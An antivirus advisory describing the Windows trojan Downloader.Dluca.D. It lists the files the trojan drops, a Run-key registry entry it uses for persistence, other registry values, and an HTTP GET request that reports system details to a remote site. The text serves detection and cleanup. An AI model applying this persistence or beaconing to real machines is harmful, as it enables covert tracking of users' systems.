Downloader.Dluca.D

Printer Friendly Page

Discovered: October 29, 2003
Updated: October 30, 2003 5:21:29 PM
Systems Affected: Windows

Downloader.Dluca.D is a downloader trojan that sends information about the compromised system to a specific website.

Discovered: October 29, 2003
Updated: October 30, 2003 5:21:29 PM
Systems Affected: Windows

Downloader.Dluca.D is a trojan program that sends information about the compromised system to a remote website. When the trojan is installed, it creates the following copies of itself:
%System%\DLuxjp-uninstall.exe
C:\Program Files\Dialers\Dluxjp\DLuxjp.exe

It also creates the following icon file:
C:\Program Files\Dialers\Links\DLuxjp.ico

It then creates the following registry entry so that it executes every time Windows starts:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"Dluxjp"="C:\Program Files\Dialers\Dluxjp\Dluxjp.exe /noconnect"

It also inserts the following registry values:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\uninstall\DLuxjp\"DisplayName" = "DLuxjp"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\uninstall\DLuxjp\"UninstallString" = "%System%\DLux-uninstall.exe /uninstall"

HKEY_CURRENT_USER\SOFTWARE\SiteIcons\Dialers\DLuxjp\"ICN" = "Y"

HKEY_CURRENT_USER\SOFTWARE\SiteIcons\Dialers\DLuxjp\"MIMETRYPE_DESCRIPTION" = ".x"

The trojan then sends system information to a remote system on TCP port 80. It sends the following HTTP GET request:
GET /w/getclientid?srv=winde&ver=0,0,0,70&pin=999997&OSInfo=Windows_4.10.67766446__A__PlatformID_1&GMC=1061242491
HTTP/1.1